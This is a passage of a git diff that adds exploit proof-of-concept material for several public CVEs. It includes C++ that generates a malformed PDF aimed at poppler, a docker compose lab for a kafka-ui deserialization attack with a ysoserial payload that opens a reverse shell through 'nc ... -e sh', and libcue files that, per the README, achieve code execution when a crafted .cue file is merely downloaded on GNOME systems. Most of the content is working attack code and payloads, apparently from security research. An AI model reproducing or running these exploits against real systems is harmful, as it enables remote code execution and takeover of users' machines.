+// Like PDF_Int, except with padded output so that the number of
+// characters is always the same. This is useful for integer values
+// that aren't known until the second pass.
+class PDF_IntF : public PDF {
+  const int i_;
+  const int w_;
+
+public:
+  explicit PDF_IntF(int i, int w) : i_(i), w_(w) {}
+
+  static std::unique_ptr<PDF> mk(int i, int w = 10) {
+    return std::make_unique<PDF_IntF>(i, w);
+  }
+
+  void write(WriteBuf &buf) const override {
+    char str[32];
+    assert(0 <= w_ && w_ < static_cast<int>(sizeof(str)));
+    snprintf(str, sizeof(str), "%*d", w_, i_);
+    buf.write_bytes((const uint8_t *)str, w_);
+    buf.write_string("\n");
+  }
+};
+
+class PDF_Num : public PDF {
+  const double d_;
+
+public:
+  explicit PDF_Num(double d) : d_(d) {}
+
+  static std::unique_ptr<PDF> mk(double d) {
+    return std::make_unique<PDF_Num>(d);
+  }
+
+  void write(WriteBuf &buf) const override { write_numobj(buf, d_); }
+};
+
+class PDF_Ref : public PDF {
+  const int num_;
+  const int gen_;
+
+public:
+  PDF_Ref(int num, int gen) : num_(num), gen_(gen) {}
+
+  static std::unique_ptr<PDF> mk(int num, int gen) {
+    return std::make_unique<PDF_Ref>(num, gen);
+  }
+
+  void write(WriteBuf &buf) const override {
+    write_intobj(buf, num_);
+    write_intobj(buf, gen_);
+    buf.write_string("R ");
+  }
+};
+
+class PDF_Cmd : public PDF {
+  const std::string cmd_;
+
+public:
+  explicit PDF_Cmd(std::string &&cmd) : cmd_(std::move(cmd)) {}
+
+  static std::unique_ptr<PDF> mk(std::string &&cmd) {
+    return std::make_unique<PDF_Cmd>(std::move(cmd));
+  }
+
+  void write(WriteBuf &buf) const override { write_command(buf, cmd_); }
+};
+
+class PDF_Name : public PDF {
+  const std::string name_;
+
+public:
+  explicit PDF_Name(std::string &&name) : name_(std::move(name)) {}
+
+  static std::unique_ptr<PDF> mk(std::string &&name) {
+    return std::make_unique<PDF_Name>(std::move(name));
+  }
+
+  void write(WriteBuf &buf) const override { write_nameobj(buf, name_); }
+};
+
+class PDF_String : public PDF {
+  const std::string str_;
+
+public:
+  explicit PDF_String(std::string &&str) : str_(std::move(str)) {}
+
+  static std::unique_ptr<PDF> mk(std::string &&str) {
+    return std::make_unique<PDF_String>(std::move(str));
+  }
+
+  void write(WriteBuf &buf) const override { write_stringobj(buf, str_); }
+};
+
+class PDF_Comment : public PDF {
+  const std::string comment_;
+
+public:
+  explicit PDF_Comment(std::string &&comment) : comment_(std::move(comment)) {}
+
+  static std::unique_ptr<PDF> mk(std::string &&comment) {
+    return std::make_unique<PDF_Comment>(std::move(comment));
+  }
+
+  void write(WriteBuf &buf) const override {
+    buf.write_string("%");
+    buf.write_string(comment_.c_str());
+    buf.write_string("\n");
+  }
+};
+
+class PDF_Seq : public PDF {
+  const PDFvec seq_;
+
+public:
+  explicit PDF_Seq(std::vector<std::unique_ptr<PDF>> &&seq)
+      : seq_(std::move(seq)) {}
+
+  static std::unique_ptr<PDF> mk(PDFvec &&seq) {
+    return std::make_unique<PDF_Seq>(std::move(seq));
+  }
+
+  void write(WriteBuf &buf) const override {
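+    // Write each element in order; the elements emit their own separators.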
+    for (auto &x : seq_) {
+      x->write(buf);
+    }
+  }
+};
+
+class PDF_Array : public PDF {
+  const PDFvec array_;
+
+public:
+  explicit PDF_Array(std::vector<std::unique_ptr<PDF>> &&array)
+      : array_(std::move(array)) {}
+
+  static std::unique_ptr<PDF> mk(PDFvec &&array) {
+    return std::make_unique<PDF_Array>(std::move(array));
+  }
+
+  void write(WriteBuf &buf) const override {
+    buf.write_string("[ ");
+    for (auto &x : array_) {
+      x->write(buf);
+    }
+    buf.write_string("] ");
+  }
+};
+
+// key-value pair for a dict.
+struct PDF_KV {
+  std::string key_;
+  PDFptr value_;
+
+  PDF_KV(std::string &&key, PDFptr &&value)
+      : key_(std::move(key)), value_(std::move(value)) {}
+};
+
+class PDF_Dict : public PDF {
+  const std::vector<PDF_KV> dict_;
+
+public:
+  explicit PDF_Dict(std::vector<PDF_KV> &&dict) : dict_(std::move(dict)) {}
+
+  static std::unique_ptr<PDF> mk(std::vector<PDF_KV> &&dict) {
+    return std::make_unique<PDF_Dict>(std::move(dict));
+  }
+
+  void write(WriteBuf &buf) const override {
+    buf.write_string("<< ");
+    for (auto &kv : dict_) {
+      write_nameobj(buf, kv.key_);
+      kv.value_->write(buf);
+    }
+    buf.write_string(">> ");
+  }
+};
+
+class PDF_Stream : public PDF {
+  const std::vector<uint8_t> stream_;
+
+public:
+  explicit PDF_Stream(const std::string &str)
+      : stream_(str.begin(), str.end()) {}
+
+  explicit PDF_Stream(std::vector<uint8_t> &&stream)
+      : stream_(std::move(stream)) {}
+
+  static std::unique_ptr<PDF> mk(const std::string &str) {
+    return std::make_unique<PDF_Stream>(str);
+  }
+
+  static std::unique_ptr<PDF> mk(std::vector<uint8_t> &&stream) {
+    return std::make_unique<PDF_Stream>(std::move(stream));
+  }
+
+  void write(WriteBuf &buf) const override {
+    buf.write_string("stream\n");
+    buf.write_bytes(stream_.data(), stream_.size());
+    buf.write_string(" endstream\n");
+  }
+};
+
+struct OffsetsTable {
+  size_t filesize_ = 0;
+  size_t startbody_ = 0;
+  size_t startxref_ = 0;
+
+  size_t ref001_ = 0;
+  size_t ref002_ = 0;
+  size_t ref003_ = 0;
+  size_t ref004_ = 0;
+  size_t ref005_ = 0;
+  size_t ref006_ = 0;
+
+  size_t stream000_start_ = 0;
+  size_t stream000_end_ = 0;
+};
+
+static const size_t XRefEntrySize = sizeof(uint32_t) + 2 * sizeof(uint64_t);
+
+static void writeXRefEntry(uint8_t *entry, uint32_t type, uint64_t offset,
+                           uint64_t gen) {
+  *(uint32_t *)entry = htobe32(type);
+  entry += sizeof(type);
+  *(uint64_t *)entry = htobe64(offset);
+  entry += sizeof(offset);
+  *(uint64_t *)entry = htobe64(gen);
+}
+
+static PDFptr mkAnnotOverflow(const OffsetsTable &offsets) {
+  const int first0 = 0;
+  const int len0 = 7;
+  const int first1 = static_cast<int>(offsets.ref005_);
+  const int len1 = 1;
+  const int numEntries = len0 + len1;
+  const int streamsize = numEntries * XRefEntrySize;
+  std::vector<uint8_t> stream(streamsize);
+  uint8_t *streamdata = stream.data();
+
+  writeXRefEntry(streamdata, 1, 0, 0);
+  streamdata += XRefEntrySize;
+  writeXRefEntry(streamdata, 1, offsets.ref001_, 0);
+  streamdata += XRefEntrySize;
+  writeXRefEntry(streamdata, 1, offsets.ref002_, 0);
+  streamdata += XRefEntrySize;
+  writeXRefEntry(streamdata, 1, offsets.ref003_, 0);
+  streamdata += XRefEntrySize;
+  writeXRefEntry(streamdata, 1, offsets.ref004_, 0);
+  streamdata += XRefEntrySize;
+  writeXRefEntry(streamdata, 2, offsets.ref005_, 0);
+  streamdata += XRefEntrySize;
+  writeXRefEntry(streamdata, 1, offsets.ref006_, 0);
+  streamdata += XRefEntrySize;
+  writeXRefEntry(streamdata, 1, offsets.ref005_, 0);
+
+  return PDF_Seq::mk(_vec(
+      PDF_Int::mk(1337), PDF_Int::mk(133713), PDF_Cmd::mk("obj"),
+      PDF_Dict::mk(_vec(
+          PDF_KV(std::string("Size"), PDF_Int::mk(1337)),
+          PDF_KV(std::string("Length"), PDF_Int::mk(streamsize)),
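+          // (W below gives the field widths of each entry in the stream
+          // above; Index lists the object-number ranges the entries cover.)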
PDF_KV(std::string("Prev"), + PDF_Int::mk(-1)), // link to next XRef table + PDF_KV(std::string("Root"), PDF_Ref::mk(1, 0)), + PDF_KV(std::string("Index"), + PDF_Array::mk(_vec( + PDF_IntF::mk(first0, 4), PDF_IntF::mk(len0, 3), + PDF_IntF::mk(first1, 4), PDF_IntF::mk(len1, 3)))), + PDF_KV(std::string("W"), + PDF_Array::mk(_vec(PDF_Int::mk(4), PDF_Int::mk(8), + PDF_Int::mk(8)))))), + PDF_Stream::mk(std::move(stream)))); +} + +static PDFptr mkContents(OffsetsTable &offsets) { + const int streamsize = + static_cast(offsets.stream000_end_ - offsets.stream000_start_); + return PDF_Seq::mk(_vec( + PDF_Dict::mk(_vec( + PDF_KV(std::string("Length"), PDF_IntF::mk(streamsize)))), + PDF_ReadPostOffset::mk( + [&offsets](size_t offset) { offsets.stream000_start_ = offset; }, + PDF_Cmd::mk("stream")), + PDF_Name::mk("kevstatearg"), PDF_Cmd::mk("gs"), + PDF_ReadPreOffset::mk( + [&offsets](size_t offset) { offsets.stream000_end_ = offset; }, + PDF_Cmd::mk("endstream")))); +} + +static const int mkAnnotArray_first = 20; + +static std::vector mkAnnotArray_ObjectStream(size_t nElements, + size_t nLayers) { + std::vector txt(mkAnnotArray_first); + + PDFptr prologue = PDF_Seq::mk( + _vec(PDF_IntF::mk(5), PDF_Int::mk(mkAnnotArray_first))); + WriteBuf buf(txt.data(), mkAnnotArray_first); + prologue->write(buf); + while (buf.offset() < mkAnnotArray_first) { + buf.write_string(" "); + } + + char reftxt[6] = {'6', ' ', '0', ' ', 'R', ' '}; + + const size_t offset = txt.size(); + txt.resize(offset + nElements * sizeof(reftxt) + 2); + uint8_t *p = txt.data() + offset; + *p++ = '['; + for (size_t i = 0; i < nElements; i++) { + memcpy(p, reftxt, sizeof(reftxt)); + p += sizeof(reftxt); + } + *p++ = ']'; + + for (size_t i = 0; i < nLayers; i++) { + std::vector tmp; + compress(tmp, txt); + txt = std::move(tmp); + } + + return txt; +} + +static PDFptr mkAnnots() { + static const std::vector annots_txt( + mkAnnotArray_ObjectStream(0x1000000, 2)); + std::vector txt = annots_txt; + const int streamsize = static_cast(txt.size()); + return PDF_Seq::mk(_vec( + PDF_Dict::mk(_vec( + PDF_KV(std::string("N"), PDF_IntF::mk(1)), + PDF_KV(std::string("First"), PDF_Int::mk(mkAnnotArray_first)), + PDF_KV(std::string("Length"), PDF_Int::mk(streamsize)), + PDF_KV(std::string("Filter"), + PDF_Array::mk(_vec(PDF_Name::mk("FlateDecode"), + PDF_Name::mk("FlateDecode")))))), + PDF_Stream::mk(std::move(txt)))); +} + +static PDFptr mkBody(OffsetsTable &offsets) { + const int numKids = 256; + std::vector kids; + for (size_t i = 0; i < numKids; i++) { + kids.push_back(PDF_Ref::mk(3, 0)); + } + return PDF_Seq::mk(_vec( + // root + PDF_ReadPreOffset::mk( + [&offsets](size_t offset) { offsets.ref001_ = offset; }, + PDF_Int::mk(1)), + PDF_Int::mk(0), PDF_Cmd::mk("obj"), + PDF_Dict::mk(_vec( + PDF_KV(std::string("Pages"), PDF_Ref::mk(2, 0)), + PDF_KV(std::string("AcroForm"), + PDF_Dict::mk(_vec( + PDF_KV(std::string("Fields"), + PDF_Array::mk(_vec(PDF_Ref::mk(6, 0)))))) + + ), + PDF_KV(std::string("Size"), PDF_Int::mk(2)), + PDF_KV(std::string("Length"), PDF_Int::mk(1337)))), + // pages + PDF_ReadPreOffset::mk( + [&offsets](size_t offset) { offsets.ref002_ = offset; }, + PDF_Int::mk(2)), + PDF_Int::mk(0), PDF_Cmd::mk("obj"), + PDF_Dict::mk(_vec( + PDF_KV(std::string("Pages"), + PDF_Dict::mk(_vec( + PDF_KV(std::string("Count"), PDF_Int::mk(1))))), + PDF_KV(std::string("Size"), PDF_Int::mk(2)), + PDF_KV(std::string("Count"), PDF_Int::mk(numKids)), + PDF_KV(std::string("Kids"), PDF_Array::mk(std::move(kids))), + PDF_KV(std::string("Length"), 
+                 PDF_Int::mk(1337)))),
+      // kid
+      PDF_ReadPreOffset::mk(
+          [&offsets](size_t offset) { offsets.ref003_ = offset; },
+          PDF_Int::mk(3)),
+      PDF_Int::mk(0), PDF_Cmd::mk("obj"),
+      PDF_Dict::mk(
+          _vec(PDF_KV(std::string("Type"), PDF_Name::mk("Page")),
+               PDF_KV(std::string("Contents"), PDF_Ref::mk(4, 0)),
+               PDF_KV(std::string("Annots"), PDF_Ref::mk(5, 0)),
+               PDF_KV(std::string("Size"), PDF_Int::mk(2)),
+               PDF_KV(std::string("Count"), PDF_Int::mk(1)))),
+      // contents
+      PDF_ReadPreOffset::mk(
+          [&offsets](size_t offset) { offsets.ref004_ = offset; },
+          PDF_Int::mk(4)),
+      PDF_Int::mk(0), PDF_Cmd::mk("obj"), mkContents(offsets),
+      // annots
+      PDF_ReadPreOffset::mk(
+          [&offsets](size_t offset) { offsets.ref005_ = offset; },
+          PDF_IntF::mk(static_cast<int>(offsets.ref005_))),
+      PDF_Int::mk(0), PDF_Cmd::mk("obj"), mkAnnots(),
+      // widget
+      PDF_ReadPreOffset::mk(
+          [&offsets](size_t offset) { offsets.ref006_ = offset; },
+          PDF_IntF::mk(6)),
+      PDF_Int::mk(0), PDF_Cmd::mk("obj"),
+      PDF_Dict::mk(_vec(
+          PDF_KV(std::string("Subtype"), PDF_Name::mk("Widget")),
+          PDF_KV(std::string("DV"), PDF_String::mk("kevwozere001")),
+          PDF_KV(std::string("V"), PDF_String::mk("kevwozere002")),
+          PDF_KV(std::string("Ff"), PDF_Int::mk(0xDEADBEEF)),
+          PDF_KV(std::string("MaxLen"), PDF_Int::mk(0xDEADBEEF)),
+          PDF_KV(std::string("F"), PDF_Int::mk(2)), // Annot::flagHidden
+          PDF_KV(std::string("Rect"),
+                 PDF_Array::mk(_vec(PDF_Int::mk(2), PDF_Int::mk(3),
+                                    PDF_Int::mk(4), PDF_Int::mk(5)))),
+          PDF_KV(std::string("FT"), PDF_Name::mk("Tx"))))));
+}
+
+static PDFptr mkXRef(const OffsetsTable &offsets) {
+  return mkAnnotOverflow(offsets);
+}
+
+static PDFptr mkPDF(OffsetsTable &offsets) {
+  return PDF_Seq::mk(_vec(
+      PDF_Comment::mk("PDF-1.7"), PDF_Int::mk(4), PDF_Int::mk(0),
+      PDF_Cmd::mk("obj"),
+      PDF_Dict::mk(_vec(
+          PDF_KV(std::string("Linearized"), PDF_Int::mk(-1)),
+          PDF_KV(std::string("L"),
+                 PDF_IntF::mk(static_cast<int>(offsets.filesize_))),
+          PDF_KV(std::string("T"), PDF_Int::mk(1000000)))),
+      PDF_Cmd::mk("endobj"),
+      PDF_ReadPreOffset::mk(
+          [&offsets](size_t offset) { offsets.startbody_ = offset; },
+          mkBody(offsets)),
+      PDF_ReadPreOffset::mk(
+          [&offsets](size_t offset) { offsets.startxref_ = offset; },
+          mkXRef(offsets)),
+      PDF_Cmd::mk("startxref"),
+      PDF_IntF::mk(static_cast<int>(offsets.startxref_)),
+      PDF_ReadPostOffset::mk(
+          [&offsets](size_t offset) { offsets.filesize_ = offset; },
+          PDF_Comment::mk("%EOF"))));
+}
+
+int main() {
+  try {
+    std::vector<uint8_t> rawbuf(0x10000);
+
+    OffsetsTable offsets;
+
+    WriteBuf buf(rawbuf.data(), rawbuf.size());
+
+    offsets.ref005_ = 100;
+    // Two passes. The first pass calculates the values of filesize and
+    // startxref.
+    PDFptr pdf = mkPDF(offsets);
+    pdf->write(buf);
+
+    const size_t oldfilesize = buf.offset();
+    buf.reset();
+
+    pdf = mkPDF(offsets);
+    pdf->write(buf);
+    if (oldfilesize != buf.offset()) {
+      throw Error("filesize changed on second pass");
+    }
+
+    buf.write_to_fd(STDOUT_FILENO);
+
+    return EXIT_SUCCESS;
+  } catch (Error &e) {
+    fprintf(stderr, "%s\n", e.what());
+    return EXIT_FAILURE;
+  }
+}
diff --git a/SecurityExploits/freedesktop/poppler-CVE-2025-52886/utils.cpp b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/utils.cpp
new file mode 100644
index 0000000..5de68bd
--- /dev/null
+++ b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/utils.cpp
@@ -0,0 +1,147 @@
+#include "utils.h"
+#include <algorithm>
+#include <assert.h>
+#include <stddef.h>
+#include <stdint.h>
+#include <string.h>
+#include <unistd.h>
+#include <zlib.h>
+
+// Write a uint8_t to starting address &buf[pos].
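+// Returns the updated position, i.e. one past the last byte written.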
+size_t WriteBuf::write_uint8_at(size_t pos, uint8_t x) {
+  assert(bufsize_ >= pos);
+  assert(bufsize_ - pos >= sizeof(uint8_t));
+  buf_[pos++] = x;
+  return pos;
+}
+
+// Write a uint16_t to starting address &buf_[pos] (in big endian
+// order).
+size_t WriteBuf::write_uint16_at(size_t pos, uint16_t x) {
+  assert(bufsize_ >= pos);
+  assert(bufsize_ - pos >= sizeof(uint16_t));
+  buf_[pos++] = (x >> 8) & 0xFF;
+  buf_[pos++] = x & 0xFF;
+  return pos;
+}
+
+// Write a uint32_t to starting address &buf_[pos] (in big endian
+// order).
+size_t WriteBuf::write_uint32_at(size_t pos, uint32_t x) {
+  assert(bufsize_ >= pos);
+  assert(bufsize_ - pos >= sizeof(uint32_t));
+  buf_[pos++] = (x >> 24) & 0xFF;
+  buf_[pos++] = (x >> 16) & 0xFF;
+  buf_[pos++] = (x >> 8) & 0xFF;
+  buf_[pos++] = x & 0xFF;
+  return pos;
+}
+
+// Write a block of bytes to starting address &buf_[pos].
+size_t WriteBuf::write_many_at(size_t pos, uint8_t x, size_t n) {
+  assert(bufsize_ >= pos);
+  assert(bufsize_ - pos >= n);
+  memset(&buf_[pos], x, n);
+  pos += n;
+  return pos;
+}
+
+// Write a string to starting address &buf_[pos].
+size_t WriteBuf::write_bytes_at(size_t pos, const uint8_t *bytes, size_t n) {
+  assert(bufsize_ >= pos);
+  assert(bufsize_ - pos >= n);
+  memcpy(&buf_[pos], bytes, n);
+  pos += n;
+  return pos;
+}
+
+// Write a uint8_t to starting address &buf[offset_].
+void WriteBuf::write_uint8(uint8_t x) { offset_ = write_uint8_at(offset_, x); }
+
+// Write a uint16_t to starting address &buf_[offset_] (in big endian
+// order).
+void WriteBuf::write_uint16(uint16_t x) {
+  offset_ = write_uint16_at(offset_, x);
+}
+
+// Write a uint32_t to starting address &buf_[offset_] (in big endian
+// order).
+void WriteBuf::write_uint32(uint32_t x) {
+  offset_ = write_uint32_at(offset_, x);
+}
+
+// Write a block of bytes to starting address &buf_[offset_].
+void WriteBuf::write_many(uint8_t x, size_t n) {
+  offset_ = write_many_at(offset_, x, n);
+}
+
+// Write n bytes to starting address &buf_[offset_].
+void WriteBuf::write_bytes(const uint8_t *bytes, size_t n) {
+  offset_ = write_bytes_at(offset_, bytes, n);
+}
+
+// Write a string to starting address &buf_[offset_].
+void WriteBuf::write_string(const char *str) {
+  write_bytes(reinterpret_cast<const uint8_t *>(str), strlen(str));
+}
+
+size_t WriteBuf::offset() const { return offset_; }
+
+// Inserts an n-byte gap, so that the bytes can be written later. This is
+// usually used for size or offset fields that need to be calculated
+// later.
+size_t WriteBuf::insert_gap(size_t n) {
+  const size_t pos = offset_;
+  assert(bufsize_ >= pos);
+  assert(bufsize_ - pos >= n);
+  offset_ = pos + n;
+  return pos;
+}
+
+void WriteBuf::write_to_fd(int fd) { write(fd, buf_, offset_); }
+
+int compress(std::vector<uint8_t> &output, std::vector<uint8_t> &input) {
+  int ret;
+  z_stream strm;
+
+  strm.zalloc = nullptr;
+  strm.zfree = nullptr;
+  strm.opaque = nullptr;
+
+  ret = deflateInit(&strm, Z_BEST_COMPRESSION);
+  if (ret != Z_OK)
+    return ret;
+
+  size_t input_pos = 0;
+  size_t output_pos = 0;
+
+  strm.avail_in = input.size();
+  strm.next_in = input.data();
+  output.resize(0x10000);
+
+  while (input_pos < input.size() || strm.avail_out == 0) {
+    assert(input_pos <= input.size());
+    assert(output_pos <= output.size());
+    if (output_pos == output.size()) {
+      output.resize(output.size() * 2);
+    }
+
+    const size_t total_avail_in = input.size() - input_pos;
+    const size_t avail_in = std::min<size_t>(0x10000, total_avail_in);
+    const int flush = avail_in < total_avail_in ? Z_NO_FLUSH : Z_FINISH;
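+    // Feed the next chunk to deflate below; flush is Z_FINISH only on the
+    // final chunk, which tells zlib to terminate the stream.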
+    strm.avail_in = avail_in;
+    strm.next_in = input.data() + input_pos;
+    strm.avail_out = output.size() - output_pos;
+    strm.next_out = output.data() + output_pos;
+    ret = deflate(&strm, flush);
+    assert(ret != Z_STREAM_ERROR);
+    output_pos = output.size() - strm.avail_out;
+    input_pos += avail_in - strm.avail_in;
+  }
+  assert(strm.avail_in == 0);
+  assert(ret == Z_STREAM_END);
+  output.resize(output.size() - strm.avail_out);
+
+  (void)deflateEnd(&strm);
+  return Z_OK;
+}
diff --git a/SecurityExploits/freedesktop/poppler-CVE-2025-52886/utils.h b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/utils.h
new file mode 100644
index 0000000..1e1b2a9
--- /dev/null
+++ b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/utils.h
@@ -0,0 +1,74 @@
+#pragma once
+
+#include <stddef.h>
+#include <stdint.h>
+#include <vector>
+
+class WriteBuf {
+  uint8_t *buf_;
+  const size_t bufsize_;
+  size_t offset_ = 0;
+
+public:
+  WriteBuf(uint8_t *buf, size_t bufsize) : buf_(buf), bufsize_(bufsize) {}
+
+  void reset() { offset_ = 0; }
+
+  // Write a uint8_t to starting address &buf[pos].
+  size_t write_uint8_at(size_t pos, uint8_t x);
+
+  // Write a uint16_t to starting address &buf_[pos] (in big endian
+  // order).
+  size_t write_uint16_at(size_t pos, uint16_t x);
+
+  // Write a uint32_t to starting address &buf_[pos] (in big endian
+  // order).
+  size_t write_uint32_at(size_t pos, uint32_t x);
+
+  // Write a block of bytes to starting address &buf_[pos].
+  size_t write_many_at(size_t pos, uint8_t x, size_t n);
+
+  // Write a string to starting address &buf_[pos].
+  size_t write_bytes_at(size_t pos, const uint8_t *bytes, size_t n);
+
+  // Write a uint8_t to starting address &buf[offset_].
+  void write_uint8(uint8_t x);
+
+  // Write a uint16_t to starting address &buf_[offset_] (in big endian
+  // order).
+  void write_uint16(uint16_t x);
+
+  // Write a uint32_t to starting address &buf_[offset_] (in big endian
+  // order).
+  void write_uint32(uint32_t x);
+
+  // Write a block of bytes to starting address &buf_[offset_].
+  void write_many(uint8_t x, size_t n);
+
+  // Write n bytes to starting address &buf_[offset_].
+  void write_bytes(const uint8_t *bytes, size_t n);
+
+  // Write a string to starting address &buf_[offset_].
+  void write_string(const char *str);
+
+  size_t offset() const;
+
+  // Inserts an n-byte gap, so that the bytes can be written later. This is
+  // usually used for size or offset fields that need to be calculated
+  // later.
+  size_t insert_gap(size_t n);
+
+  void write_to_fd(int fd);
+};
+
+// Utility for constructing a std::vector.
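+// Arguments are moved into the result in order; pdfgen.cpp uses this to
+// build PDFvec and std::vector<PDF_KV> values concisely.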
+template <typename... Ts>
+std::vector<typename std::common_type<Ts...>::type> _vec(Ts &&...args) {
+  std::vector<typename std::common_type<Ts...>::type> result;
+  result.reserve(sizeof...(args));
+  int bogus[] = {((void)result.emplace_back(std::forward<Ts>(args)), 0)...};
+  static_assert(sizeof(bogus) == sizeof(int) * sizeof...(args));
+  return result;
+}
+
+int compress(std::vector<uint8_t> &output, std::vector<uint8_t> &input);
diff --git a/SecurityExploits/kafkaui/compose.yml b/SecurityExploits/kafkaui/compose.yml
new file mode 100644
index 0000000..e474dba
--- /dev/null
+++ b/SecurityExploits/kafkaui/compose.yml
@@ -0,0 +1,56 @@
+version: '3'
+services:
+  zookeeper:
+    image: 'confluentinc/cp-zookeeper:7.6.1'
+    environment:
+      ZOOKEEPER_CLIENT_PORT: 2181
+
+  kafka:
+    image: 'confluentinc/cp-kafka:7.6.1'
+    depends_on:
+      - zookeeper
+    ports:
+      - 9092:9092
+    environment:
+      KAFKA_ZOOKEEPER_CONNECT: 'zookeeper:2181'
+      KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://kafka:9092
+      KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT
+      KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT
+
+  kafka-ui:
+    image: provectuslabs/kafka-ui:v0.7.1
+    depends_on:
+      - kafka
+    ports:
+      - 8091:8080
+      - 5005:5005
+    environment:
+      KAFKA_CLUSTERS_0_NAME: local
+      KAFKA_CLUSTERS_0_BOOTSTRAPSERVERS: 'kafka:9092'
+      KAFKA_CLUSTERS_0_ZOOKEEPER: 'zookeeper:2181'
+      DYNAMIC_CONFIG_ENABLED: 'true'
+      JAVA_TOOL_OPTIONS: '-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005'
+
+  kafka-malicious-broker:
+    image: 'confluentinc/cp-kafka:7.6.1'
+    depends_on:
+      - zookeeper
+    ports:
+      - 9093:9093
+    environment:
+      KAFKA_ZOOKEEPER_CONNECT: 'zookeeper:2181'
+      KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://host.docker.internal:9093
+      KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT
+      KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT
+
+  ysoserial-stage1:
+    build: https://github.com/artsploit/ysoserial.git#scala1
+    ports:
+      - 1718:1718
+    entrypoint: java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1718 Scala1 "org.apache.commons.collections.enableUnsafeSerialization:true"
+
+  ysoserial-stage2:
+    build: https://github.com/artsploit/ysoserial.git#scala1
+    ports:
+      - 1719:1719
+    entrypoint: java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1719 CommonsCollections7 "nc host.docker.internal 1234 -e sh"
\ No newline at end of file
diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/.gitignore b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/.gitignore
new file mode 100644
index 0000000..c407b35
--- /dev/null
+++ b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/.gitignore
@@ -0,0 +1 @@
+mkcue
diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/CVE-2023-43641-poc-simple.cue b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/CVE-2023-43641-poc-simple.cue
new file mode 100644
index 0000000..d9788d9
--- /dev/null
+++ b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/CVE-2023-43641-poc-simple.cue
@@ -0,0 +1,6 @@
+FILE pwned.mp3 MP3
+TRACK 000 AUDIO
+MESSAGE "simple poc for CVE-2023-43641"
+INDEX 4294567296 0
+INDEX 4290967296 0
+INDEX 4254967296 0
diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/Makefile b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/Makefile
new file mode 100644
index 0000000..8ea0ebc
--- /dev/null
+++ b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/Makefile
@@ -0,0 +1,7 @@
+all: mkcue
+
+clean:
+	rm mkcue
+
+mkcue: mkcue.cpp utils.cpp utils.h
+	g++ -Wall -Wextra mkcue.cpp utils.cpp -o mkcue
diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/README.md
b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/README.md new file mode 100644 index 0000000..c370f38 --- /dev/null +++ b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/README.md @@ -0,0 +1,17 @@ +# CVE-2023-43641 + +This directory contains three PoCs for libcue [CVE-2023-43641](https://github.com/lipnitsk/libcue/security/advisories/GHSA-5982-x7hv-r9cj). + +The first PoC is [CVE-2023-43641-poc-simple.cue](CVE-2023-43641-poc-simple.cue). Downloading [CVE-2023-43641-poc-simple.cue](CVE-2023-43641-poc-simple.cue) should trigger the bug on most GNOME systems, because [tracker-miners](https://gitlab.gnome.org/GNOME/tracker-miners) automatically scans files in `~/Downloads`. If the filename has a `.cue` extension, then tracker-miners uses [libcue](https://github.com/lipnitsk/libcue) to scan the file. The PoC triggers an out-of-bounds array access, which causes the tracker-extract process to crash (on an unpatched system). + +The second PoC is [lunar.cue](lunar.cue), which exploits the vulnerability to pop a calculator when downloaded on an unpatched Ubuntu 23.04. Here's a [video](https://youtu.be/beOwspTnc1Y) of this PoC. + +The third PoC is [fedora38.cue](fedora38.cue), which pops a calculator when downloaded on an unpatched Fedora 38. + +The second and third PoCs are both generated by [mkcue.cpp](mkcue.cpp), which you can build and run like this: + +```bash +make +./mkcue Ubuntu23_04 > lunar.cue +./mkcue Fedora38 > fedora38.cue +``` diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/fedora38.cue b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/fedora38.cue new file mode 100644 index 0000000..37189ec --- /dev/null +++ b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/fedora38.cue @@ -0,0 +1,44691 @@ +PERFORMER Kev +TITLE "Kev'z Warez" +FILE pwned.mp3 MP3 + +TRACK 000 AUDIO +MESSAGE "First some [heap feng shui](https://en.wikipedia.org/wiki/Heap_feng_shui): +allocate memory so that all subsequent allocations come from a continguous block of +memory. For example, this string is 251 characters long to use a chunk from tcache +index 15." +TRACK 001 AUDIO +TITLE "A Track is 0x3a8 bytes, so creating many new tracks is a quick way to use lots of memory." 
